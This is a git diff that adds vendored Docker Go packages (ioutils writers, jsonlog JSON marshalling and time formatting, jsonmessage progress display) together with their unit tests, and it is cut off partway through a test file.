+func NopWriteCloser(w io.Writer) io.WriteCloser { + return &nopWriteCloser{w} +} + +// NopFlusher represents a type which flush operation is nop. +type NopFlusher struct{} + +// Flush is a nop operation. +func (f *NopFlusher) Flush() {} + +type writeCloserWrapper struct { + io.Writer + closer func() error +} + +func (r *writeCloserWrapper) Close() error { + return r.closer() +} + +// NewWriteCloserWrapper returns a new io.WriteCloser. +func NewWriteCloserWrapper(r io.Writer, closer func() error) io.WriteCloser { + return &writeCloserWrapper{ + Writer: r, + closer: closer, + } +} + +// WriteCounter wraps a concrete io.Writer and hold a count of the number +// of bytes written to the writer during a "session". +// This can be convenient when write return is masked +// (e.g., json.Encoder.Encode()) +type WriteCounter struct { + Count int64 + Writer io.Writer +} + +// NewWriteCounter returns a new WriteCounter. +func NewWriteCounter(w io.Writer) *WriteCounter { + return &WriteCounter{ + Writer: w, + } +} + +func (wc *WriteCounter) Write(p []byte) (count int, err error) { + count, err = wc.Writer.Write(p) + wc.Count += int64(count) + return +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go new file mode 100644 index 0000000000..564b1cd4f5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go @@ -0,0 +1,65 @@ +package ioutils + +import ( + "bytes" + "strings" + "testing" +) + +func TestWriteCloserWrapperClose(t *testing.T) { + called := false + writer := bytes.NewBuffer([]byte{}) + wrapper := NewWriteCloserWrapper(writer, func() error { + called = true + return nil + }) + if err := wrapper.Close(); err != nil { + t.Fatal(err) + } + if !called { + t.Fatalf("writeCloserWrapper should have call the anonymous function.") + } +} + +func TestNopWriteCloser(t *testing.T) { + writer := bytes.NewBuffer([]byte{}) + wrapper := NopWriteCloser(writer) + if err := 
wrapper.Close(); err != nil { + t.Fatal("NopWriteCloser always return nil on Close.") + } + +} + +func TestNopWriter(t *testing.T) { + nw := &NopWriter{} + l, err := nw.Write([]byte{'c'}) + if err != nil { + t.Fatal(err) + } + if l != 1 { + t.Fatalf("Expected 1 got %d", l) + } +} + +func TestWriteCounter(t *testing.T) { + dummy1 := "This is a dummy string." + dummy2 := "This is another dummy string." + totalLength := int64(len(dummy1) + len(dummy2)) + + reader1 := strings.NewReader(dummy1) + reader2 := strings.NewReader(dummy2) + + var buffer bytes.Buffer + wc := NewWriteCounter(&buffer) + + reader1.WriteTo(wc) + reader2.WriteTo(wc) + + if wc.Count != totalLength { + t.Errorf("Wrong count: %d vs. %d", wc.Count, totalLength) + } + + if buffer.String() != dummy1+dummy2 { + t.Error("Wrong message written") + } +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go new file mode 100644 index 0000000000..4734c31119 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go @@ -0,0 +1,42 @@ +package jsonlog + +import ( + "encoding/json" + "fmt" + "time" +) + +// JSONLog represents a log message, typically a single entry from a given log stream. +// JSONLogs can be easily serialized to and from JSON and support custom formatting. +type JSONLog struct { + // Log is the log message + Log string `json:"log,omitempty"` + // Stream is the log source + Stream string `json:"stream,omitempty"` + // Created is the created timestamp of log + Created time.Time `json:"time"` + // Attrs is the list of extra attributes provided by the user + Attrs map[string]string `json:"attrs,omitempty"` +} + +// Format returns the log formatted according to format +// If format is nil, returns the log message +// If format is json, returns the log marshaled in json format +// By default, returns the log with the log time formatted according to format. 
+func (jl *JSONLog) Format(format string) (string, error) { + if format == "" { + return jl.Log, nil + } + if format == "json" { + m, err := json.Marshal(jl) + return string(m), err + } + return fmt.Sprintf("%s %s", jl.Created.Format(format), jl.Log), nil +} + +// Reset resets the log to nil. +func (jl *JSONLog) Reset() { + jl.Log = "" + jl.Stream = "" + jl.Created = time.Time{} +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go new file mode 100644 index 0000000000..83ce684a8e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go @@ -0,0 +1,178 @@ +// This code was initially generated by ffjson +// This code was generated via the following steps: +// $ go get -u github.com/pquerna/ffjson +// $ make BIND_DIR=. shell +// $ ffjson pkg/jsonlog/jsonlog.go +// $ mv pkg/jsonglog/jsonlog_ffjson.go pkg/jsonlog/jsonlog_marshalling.go +// +// It has been modified to improve the performance of time marshalling to JSON +// and to clean it up. 
+// Should this code need to be regenerated when the JSONLog struct is changed, +// the relevant changes which have been made are: +// import ( +// "bytes" +//- +// "unicode/utf8" +// ) +// +// func (mj *JSONLog) MarshalJSON() ([]byte, error) { +//@@ -20,13 +16,13 @@ func (mj *JSONLog) MarshalJSON() ([]byte, error) { +// } +// return buf.Bytes(), nil +// } +//+ +// func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { +//- var err error +//- var obj []byte +//- var first bool = true +//- _ = obj +//- _ = err +//- _ = first +//+ var ( +//+ err error +//+ timestamp string +//+ first bool = true +//+ ) +// buf.WriteString(`{`) +// if len(mj.Log) != 0 { +// if first == true { +//@@ -52,11 +48,11 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { +// buf.WriteString(`,`) +// } +// buf.WriteString(`"time":`) +//- obj, err = mj.Created.MarshalJSON() +//+ timestamp, err = FastTimeMarshalJSON(mj.Created) +// if err != nil { +// return err +// } +//- buf.Write(obj) +//+ buf.WriteString(timestamp) +// buf.WriteString(`}`) +// return nil +// } +// @@ -81,9 +81,10 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { +// if len(mj.Log) != 0 { +// - if first == true { +// - first = false +// - } else { +// - buf.WriteString(`,`) +// - } +// + first = false +// buf.WriteString(`"log":`) +// ffjsonWriteJSONString(buf, mj.Log) +// } + +package jsonlog + +import ( + "bytes" + "unicode/utf8" +) + +// MarshalJSON marshals the JSONLog. +func (mj *JSONLog) MarshalJSON() ([]byte, error) { + var buf bytes.Buffer + buf.Grow(1024) + if err := mj.MarshalJSONBuf(&buf); err != nil { + return nil, err + } + return buf.Bytes(), nil +} + +// MarshalJSONBuf marshals the JSONLog and stores the result to a bytes.Buffer. 
+func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { + var ( + err error + timestamp string + first = true + ) + buf.WriteString(`{`) + if len(mj.Log) != 0 { + first = false + buf.WriteString(`"log":`) + ffjsonWriteJSONString(buf, mj.Log) + } + if len(mj.Stream) != 0 { + if first { + first = false + } else { + buf.WriteString(`,`) + } + buf.WriteString(`"stream":`) + ffjsonWriteJSONString(buf, mj.Stream) + } + if !first { + buf.WriteString(`,`) + } + buf.WriteString(`"time":`) + timestamp, err = FastTimeMarshalJSON(mj.Created) + if err != nil { + return err + } + buf.WriteString(timestamp) + buf.WriteString(`}`) + return nil +} + +func ffjsonWriteJSONString(buf *bytes.Buffer, s string) { + const hex = "0123456789abcdef" + + buf.WriteByte('"') + start := 0 + for i := 0; i < len(s); { + if b := s[i]; b < utf8.RuneSelf { + if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' { + i++ + continue + } + if start < i { + buf.WriteString(s[start:i]) + } + switch b { + case '\\', '"': + buf.WriteByte('\\') + buf.WriteByte(b) + case '\n': + buf.WriteByte('\\') + buf.WriteByte('n') + case '\r': + buf.WriteByte('\\') + buf.WriteByte('r') + default: + + buf.WriteString(`\u00`) + buf.WriteByte(hex[b>>4]) + buf.WriteByte(hex[b&0xF]) + } + i++ + start = i + continue + } + c, size := utf8.DecodeRuneInString(s[i:]) + if c == utf8.RuneError && size == 1 { + if start < i { + buf.WriteString(s[start:i]) + } + buf.WriteString(`\ufffd`) + i += size + start = i + continue + } + + if c == '\u2028' || c == '\u2029' { + if start < i { + buf.WriteString(s[start:i]) + } + buf.WriteString(`\u202`) + buf.WriteByte(hex[c&0xF]) + i += size + start = i + continue + } + i += size + } + if start < len(s) { + buf.WriteString(s[start:]) + } + buf.WriteByte('"') +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go new file mode 100644 index 0000000000..3edb271410 --- 
/dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go @@ -0,0 +1,34 @@ +package jsonlog + +import ( + "regexp" + "testing" +) + +func TestJSONLogMarshalJSON(t *testing.T) { + logs := map[*JSONLog]string{ + &JSONLog{Log: `"A log line with \\"`}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: "A log line"}: `^{\"log\":\"A log line\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: "A log line with \r"}: `^{\"log\":\"A log line with \\r\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: "A log line with & < >"}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: "A log line with utf8 : 🚀 ψ ω β"}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":\".{20,}\"}$`, + &JSONLog{Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":\".{20,}\"}$`, + &JSONLog{}: `^{\"time\":\".{20,}\"}$`, + // These ones are a little weird + &JSONLog{Log: "\u2028 \u2029"}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: string([]byte{0xaF})}: `^{\"log\":\"\\ufffd\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: string([]byte{0x7F})}: `^{\"log\":\"\x7f\",\"time\":\".{20,}\"}$`, + } + for jsonLog, expression := range logs { + data, err := jsonLog.MarshalJSON() + if err != nil { + t.Fatal(err) + } + res := string(data) + t.Logf("Result of WriteLog: %q", res) + logRe := regexp.MustCompile(expression) + if !logRe.MatchString(res) { + t.Fatalf("Log line not in expected format [%v]: %q", expression, res) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go new file mode 100644 index 0000000000..df522c0d66 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go @@ -0,0 +1,122 @@ +package jsonlog + +import ( + "bytes" + "encoding/json" + "unicode/utf8" +) + +// JSONLogs is based on JSONLog. 
+// It allows marshalling JSONLog from Log as []byte +// and an already marshalled Created timestamp. +type JSONLogs struct { + Log []byte `json:"log,omitempty"` + Stream string `json:"stream,omitempty"` + Created string `json:"time"` + + // json-encoded bytes + RawAttrs json.RawMessage `json:"attrs,omitempty"` +} + +// MarshalJSONBuf is based on the same method from JSONLog +// It has been modified to take into account the necessary changes. +func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error { + var first = true + + buf.WriteString(`{`) + if len(mj.Log) != 0 { + first = false + buf.WriteString(`"log":`) + ffjsonWriteJSONBytesAsString(buf, mj.Log) + } + if len(mj.Stream) != 0 { + if first == true { + first = false + } else { + buf.WriteString(`,`) + } + buf.WriteString(`"stream":`) + ffjsonWriteJSONString(buf, mj.Stream) + } + if len(mj.RawAttrs) > 0 { + if first { + first = false + } else { + buf.WriteString(`,`) + } + buf.WriteString(`"attrs":`) + buf.Write(mj.RawAttrs) + } + if !first { + buf.WriteString(`,`) + } + buf.WriteString(`"time":`) + buf.WriteString(mj.Created) + buf.WriteString(`}`) + return nil +} + +// This is based on ffjsonWriteJSONBytesAsString. It has been changed +// to accept a string passed as a slice of bytes. 
+func ffjsonWriteJSONBytesAsString(buf *bytes.Buffer, s []byte) { + const hex = "0123456789abcdef" + + buf.WriteByte('"') + start := 0 + for i := 0; i < len(s); { + if b := s[i]; b < utf8.RuneSelf { + if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' { + i++ + continue + } + if start < i { + buf.Write(s[start:i]) + } + switch b { + case '\\', '"': + buf.WriteByte('\\') + buf.WriteByte(b) + case '\n': + buf.WriteByte('\\') + buf.WriteByte('n') + case '\r': + buf.WriteByte('\\') + buf.WriteByte('r') + default: + + buf.WriteString(`\u00`) + buf.WriteByte(hex[b>>4]) + buf.WriteByte(hex[b&0xF]) + } + i++ + start = i + continue + } + c, size := utf8.DecodeRune(s[i:]) + if c == utf8.RuneError && size == 1 { + if start < i { + buf.Write(s[start:i]) + } + buf.WriteString(`\ufffd`) + i += size + start = i + continue + } + + if c == '\u2028' || c == '\u2029' { + if start < i { + buf.Write(s[start:i]) + } + buf.WriteString(`\u202`) + buf.WriteByte(hex[c&0xF]) + i += size + start = i + continue + } + i += size + } + if start < len(s) { + buf.Write(s[start:]) + } + buf.WriteByte('"') +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go new file mode 100644 index 0000000000..6d6ad21583 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go @@ -0,0 +1,39 @@ +package jsonlog + +import ( + "bytes" + "regexp" + "testing" +) + +func TestJSONLogsMarshalJSONBuf(t *testing.T) { + logs := map[*JSONLogs]string{ + &JSONLogs{Log: []byte(`"A log line with \\"`)}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":}$`, + &JSONLogs{Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"time\":}$`, + &JSONLogs{Log: []byte("A log line with \r")}: `^{\"log\":\"A log line with \\r\",\"time\":}$`, + &JSONLogs{Log: []byte("A log line with & < >")}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":}$`, + &JSONLogs{Log: []byte("A log 
line with utf8 : 🚀 ψ ω β")}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":}$`, + &JSONLogs{Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":}$`, + &JSONLogs{Stream: "stdout", Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":}$`, + &JSONLogs{Created: "time"}: `^{\"time\":time}$`, + &JSONLogs{}: `^{\"time\":}$`, + // These ones are a little weird + &JSONLogs{Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":}$`, + &JSONLogs{Log: []byte{0xaF}}: `^{\"log\":\"\\ufffd\",\"time\":}$`, + &JSONLogs{Log: []byte{0x7F}}: `^{\"log\":\"\x7f\",\"time\":}$`, + // with raw attributes + &JSONLogs{Log: []byte("A log line"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":}$`, + } + for jsonLog, expression := range logs { + var buf bytes.Buffer + if err := jsonLog.MarshalJSONBuf(&buf); err != nil { + t.Fatal(err) + } + res := buf.String() + t.Logf("Result of WriteLog: %q", res) + logRe := regexp.MustCompile(expression) + if !logRe.MatchString(res) { + t.Fatalf("Log line not in expected format [%v]: %q", expression, res) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go new file mode 100644 index 0000000000..2117338149 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go @@ -0,0 +1,27 @@ +// Package jsonlog provides helper functions to parse and print time (time.Time) as JSON. +package jsonlog + +import ( + "errors" + "time" +) + +const ( + // RFC3339NanoFixed is our own version of RFC339Nano because we want one + // that pads the nano seconds part with zeros to ensure + // the timestamps are aligned in the logs. 
+ RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00" + // JSONFormat is the format used by FastMarshalJSON + JSONFormat = `"` + time.RFC3339Nano + `"` +) + +// FastTimeMarshalJSON avoids one of the extra allocations that +// time.MarshalJSON is making. +func FastTimeMarshalJSON(t time.Time) (string, error) { + if y := t.Year(); y < 0 || y >= 10000 { + // RFC 3339 is clear that years are 4 digits exactly. + // See golang.org/issue/4556#c15 for more discussion. + return "", errors.New("time.MarshalJSON: year outside of range [0,9999]") + } + return t.Format(JSONFormat), nil +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go new file mode 100644 index 0000000000..02d0302c4a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go @@ -0,0 +1,47 @@ +package jsonlog + +import ( + "testing" + "time" +) + +// Testing to ensure 'year' fields is between 0 and 9999 +func TestFastTimeMarshalJSONWithInvalidDate(t *testing.T) { + aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local) + json, err := FastTimeMarshalJSON(aTime) + if err == nil { + t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json) + } + anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local) + json, err = FastTimeMarshalJSON(anotherTime) + if err == nil { + t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json) + } + +} + +func TestFastTimeMarshalJSON(t *testing.T) { + aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC) + json, err := FastTimeMarshalJSON(aTime) + if err != nil { + t.Fatal(err) + } + expected := "\"2015-05-29T11:01:02.000000003Z\"" + if json != expected { + t.Fatalf("Expected %v, got %v", expected, json) + } + + location, err := time.LoadLocation("Europe/Paris") + if err != nil { + t.Fatal(err) + } + aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location) + json, err = FastTimeMarshalJSON(aTime) + if err != nil { 
+ t.Fatal(err) + } + expected = "\"2015-05-29T11:01:02.000000003+02:00\"" + if json != expected { + t.Fatalf("Expected %v, got %v", expected, json) + } +} diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go new file mode 100644 index 0000000000..5481433c56 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go @@ -0,0 +1,225 @@ +package jsonmessage + +import ( + "encoding/json" + "fmt" + "io" + "strings" + "time" + + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/pkg/term" + "github.com/docker/go-units" +) + +// JSONError wraps a concrete Code and Message, `Code` is +// is an integer error code, `Message` is the error message. +type JSONError struct { + Code int `json:"code,omitempty"` + Message string `json:"message,omitempty"` +} + +func (e *JSONError) Error() string { + return e.Message +} + +// JSONProgress describes a Progress. terminalFd is the fd of the current terminal, +// Start is the initial value for the operation. Current is the current status and +// value of the progress made towards Total. Total is the end value describing when +// we made 100% progress for an operation. 
+type JSONProgress struct { + terminalFd uintptr + Current int64 `json:"current,omitempty"` + Total int64 `json:"total,omitempty"` + Start int64 `json:"start,omitempty"` +} + +func (p *JSONProgress) String() string { + var ( + width = 200 + pbBox string + numbersBox string + timeLeftBox string + ) + + ws, err := term.GetWinsize(p.terminalFd) + if err == nil { + width = int(ws.Width) + } + + if p.Current <= 0 && p.Total <= 0 { + return "" + } + current := units.HumanSize(float64(p.Current)) + if p.Total <= 0 { + return fmt.Sprintf("%8v", current) + } + total := units.HumanSize(float64(p.Total)) + percentage := int(float64(p.Current)/float64(p.Total)*100) / 2 + if percentage > 50 { + percentage = 50 + } + if width > 110 { + // this number can't be negative gh#7136 + numSpaces := 0 + if 50-percentage > 0 { + numSpaces = 50 - percentage + } + pbBox = fmt.Sprintf("[%s>%s] ", strings.Repeat("=", percentage), strings.Repeat(" ", numSpaces)) + } + + numbersBox = fmt.Sprintf("%8v/%v", current, total) + + if p.Current > p.Total { + // remove total display if the reported current is wonky. + numbersBox = fmt.Sprintf("%8v", current) + } + + if p.Current > 0 && p.Start > 0 && percentage < 50 { + fromStart := time.Now().UTC().Sub(time.Unix(p.Start, 0)) + perEntry := fromStart / time.Duration(p.Current) + left := time.Duration(p.Total-p.Current) * perEntry + left = (left / time.Second) * time.Second + + if width > 50 { + timeLeftBox = " " + left.String() + } + } + return pbBox + numbersBox + timeLeftBox +} + +// JSONMessage defines a message struct. It describes +// the created time, where it from, status, ID of the +// message. It's used for docker events. 
+type JSONMessage struct { + Stream string `json:"stream,omitempty"` + Status string `json:"status,omitempty"` + Progress *JSONProgress `json:"progressDetail,omitempty"` + ProgressMessage string `json:"progress,omitempty"` //deprecated + ID string `json:"id,omitempty"` + From string `json:"from,omitempty"` + Time int64 `json:"time,omitempty"` + TimeNano int64 `json:"timeNano,omitempty"` + Error *JSONError `json:"errorDetail,omitempty"` + ErrorMessage string `json:"error,omitempty"` //deprecated + // Aux contains out-of-band data, such as digests for push signing. + Aux *json.RawMessage `json:"aux,omitempty"` +} + +// Display displays the JSONMessage to `out`. `isTerminal` describes if `out` +// is a terminal. If this is the case, it will erase the entire current line +// when displaying the progressbar. +func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error { + if jm.Error != nil { + if jm.Error.Code == 401 { + return fmt.Errorf("Authentication is required.") + } + return jm.Error + } + var endl string + if isTerminal && jm.Stream == "" && jm.Progress != nil { + // [2K = erase entire current line + fmt.Fprintf(out, "%c[2K\r", 27) + endl = "\r" + } else if jm.Progress != nil && jm.Progress.String() != "" { //disable progressbar in non-terminal + return nil + } + if jm.TimeNano != 0 { + fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(jsonlog.RFC3339NanoFixed)) + } else if jm.Time != 0 { + fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(jsonlog.RFC3339NanoFixed)) + } + if jm.ID != "" { + fmt.Fprintf(out, "%s: ", jm.ID) + } + if jm.From != "" { + fmt.Fprintf(out, "(from %s) ", jm.From) + } + if jm.Progress != nil && isTerminal { + fmt.Fprintf(out, "%s %s%s", jm.Status, jm.Progress.String(), endl) + } else if jm.ProgressMessage != "" { //deprecated + fmt.Fprintf(out, "%s %s%s", jm.Status, jm.ProgressMessage, endl) + } else if jm.Stream != "" { + fmt.Fprintf(out, "%s%s", jm.Stream, endl) + } else { + fmt.Fprintf(out, "%s%s\n", jm.Status, 
endl) + } + return nil +} + +// DisplayJSONMessagesStream displays a json message stream from `in` to `out`, `isTerminal` +// describes if `out` is a terminal. If this is the case, it will print `\n` at the end of +// each line and move the cursor while displaying. +func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(*json.RawMessage)) error { + var ( + dec = json.NewDecoder(in) + ids = make(map[string]int) + ) + for { + diff := 0 + var jm JSONMessage + if err := dec.Decode(&jm); err != nil { + if err == io.EOF { + break + } + return err + } + + if jm.Aux != nil { + if auxCallback != nil { + auxCallback(jm.Aux) + } + continue + } + + if jm.Progress != nil { + jm.Progress.terminalFd = terminalFd + } + if jm.ID != "" && (jm.Progress != nil || jm.ProgressMessage != "") { + line, ok := ids[jm.ID] + if !ok { + // NOTE: This approach of using len(id) to + // figure out the number of lines of history + // only works as long as we clear the history + // when we output something that's not + // accounted for in the map, such as a line + // with no ID. + line = len(ids) + ids[jm.ID] = line + if isTerminal { + fmt.Fprintf(out, "\n") + } + } + diff = len(ids) - line + if isTerminal && diff > 0 { + fmt.Fprintf(out, "%c[%dA", 27, diff) + } + } else { + // When outputting something that isn't progress + // output, clear the history of previous lines. We + // don't want progress entries from some previous + // operation to be updated (for example, pull -a + // with multiple tags). 
+ ids = make(map[string]int) + } + err := jm.Display(out, isTerminal) + if jm.ID != "" && isTerminal && diff > 0 { + fmt.Fprintf(out, "%c[%dB", 27, diff) + } + if err != nil { + return err + } + } + return nil +} + +type stream interface { + io.Writer + FD() uintptr + IsTerminal() bool +} + +// DisplayJSONMessagesToStream prints json messages to the output stream +func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(*json.RawMessage)) error { + return DisplayJSONMessagesStream(in, stream, stream.FD(), stream.IsTerminal(), auxCallback) +} diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go new file mode 100644 index 0000000000..c6c5b0ed2a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go @@ -0,0 +1,245 @@ +package jsonmessage + +import ( + "bytes" + "fmt" + "strings" + "testing" + "time" + + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/pkg/term" +) + +func TestError(t *testing.T) { + je := JSONError{404, "Not found"} + if je.Error() != "Not found" { + t.Fatalf("Expected 'Not found' got '%s'", je.Error()) + } +} + +func TestProgress(t *testing.T) { + termsz, err := term.GetWinsize(0) + if err != nil { + // we can safely ignore the err here + termsz = nil + } + jp := JSONProgress{} + if jp.String() != "" { + t.Fatalf("Expected empty string, got '%s'", jp.String()) + } + + expected := " 1 B" + jp2 := JSONProgress{Current: 1} + if jp2.String() != expected { + t.Fatalf("Expected %q, got %q", expected, jp2.String()) + } + + expectedStart := "[==========> ] 20 B/100 B" + if termsz != nil && termsz.Width <= 110 { + expectedStart = " 20 B/100 B" + } + jp3 := JSONProgress{Current: 20, Total: 100, Start: time.Now().Unix()} + // Just look at the start of the string + // (the remaining time is really hard to test -_-) + if jp3.String()[:len(expectedStart)] != expectedStart { + t.Fatalf("Expected 
to start with %q, got %q", expectedStart, jp3.String()) + } + + expected = "[=========================> ] 50 B/100 B" + if termsz != nil && termsz.Width <= 110 { + expected = " 50 B/100 B" + } + jp4 := JSONProgress{Current: 50, Total: 100} + if jp4.String() != expected { + t.Fatalf("Expected %q, got %q", expected, jp4.String()) + } + + // this number can't be negative gh#7136 + expected = "[==================================================>] 50 B" + if termsz != nil && termsz.Width <= 110 { + expected = " 50 B" + } + jp5 := JSONProgress{Current: 50, Total: 40} + if jp5.String() != expected { + t.Fatalf("Expected %q, got %q", expected, jp5.String()) + } +} + +func TestJSONMessageDisplay(t *testing.T) { + now := time.Now() + messages := map[JSONMessage][]string{ + // Empty + JSONMessage{}: {"\n", "\n"}, + // Status + JSONMessage{ + Status: "status", + }: { + "status\n", + "status\n", + }, + // General + JSONMessage{ + Time: now.Unix(), + ID: "ID", + From: "From", + Status: "status", + }: { + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)), + }, + // General, with nano precision time + JSONMessage{ + TimeNano: now.UnixNano(), + ID: "ID", + From: "From", + Status: "status", + }: { + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + }, + // General, with both times Nano is preferred + JSONMessage{ + Time: now.Unix(), + TimeNano: now.UnixNano(), + ID: "ID", + From: "From", + Status: "status", + }: { + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + }, + // Stream over status + 
JSONMessage{ + Status: "status", + Stream: "stream", + }: { + "stream", + "stream", + }, + // With progress message + JSONMessage{ + Status: "status", + ProgressMessage: "progressMessage", + }: { + "status progressMessage", + "status progressMessage", + }, + // With progress, stream empty + JSONMessage{ + Status: "status", + Stream: "", + Progress: &JSONProgress{Current: 1}, + }: { + "", + fmt.Sprintf("%c[2K\rstatus 1 B\r", 27), + }, + } + + // The tests :) + for jsonMessage, expectedMessages := range messages { + // Without terminal + data := bytes.NewBuffer([]byte{}) + if err := jsonMessage.Display(data, false); err != nil { + t.Fatal(err) + } + if data.String() != expectedMessages[0] { + t.Fatalf("Expected [%v], got [%v]", expectedMessages[0], data.String()) + } + // With terminal + data = bytes.NewBuffer([]byte{}) + if err := jsonMessage.Display(data, true); err != nil { + t.Fatal(err) + } + if data.String() != expectedMessages[1] { + t.Fatalf("Expected [%v], got [%v]", expectedMessages[1], data.String()) + } + } +} + +// Test JSONMessage with an Error. It will return an error with the text as error, not the meaning of the HTTP code. +func TestJSONMessageDisplayWithJSONError(t *testing.T) { + data := bytes.NewBuffer([]byte{}) + jsonMessage := JSONMessage{Error: &JSONError{404, "Can't find it"}} + + err := jsonMessage.Display(data, true) + if err == nil || err.Error() != "Can't find it" { + t.Fatalf("Expected a JSONError 404, got [%v]", err) + } + + jsonMessage = JSONMessage{Error: &JSONError{401, "Anything"}} + err = jsonMessage.Display(data, true) + if err == nil || err.Error() != "Authentication is required." 
{ + t.Fatalf("Expected an error [Authentication is required.], got [%v]", err) + } +} + +func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) { + var ( + inFd uintptr + ) + data := bytes.NewBuffer([]byte{}) + reader := strings.NewReader("This is not a 'valid' JSON []") + inFd, _ = term.GetFdInfo(reader) + + if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err == nil && err.Error()[:17] != "invalid character" { + t.Fatalf("Should have thrown an error (invalid character in ..), got [%v]", err) + } +} + +func TestDisplayJSONMessagesStream(t *testing.T) { + var ( + inFd uintptr + ) + + messages := map[string][]string{ + // empty string + "": { + "", + ""}, + // Without progress & ID + "{ \"status\": \"status\" }": { + "status\n", + "status\n", + }, + // Without progress, with ID + "{ \"id\": \"ID\",\"status\": \"status\" }": { + "ID: status\n", + fmt.Sprintf("ID: status\n"), + }, + // With progress + "{ \"id\": \"ID\", \"status\": \"status\", \"progress\": \"ProgressMessage\" }": { + "ID: status ProgressMessage", + fmt.Sprintf("\n%c[%dAID: status ProgressMessage%c[%dB", 27, 1, 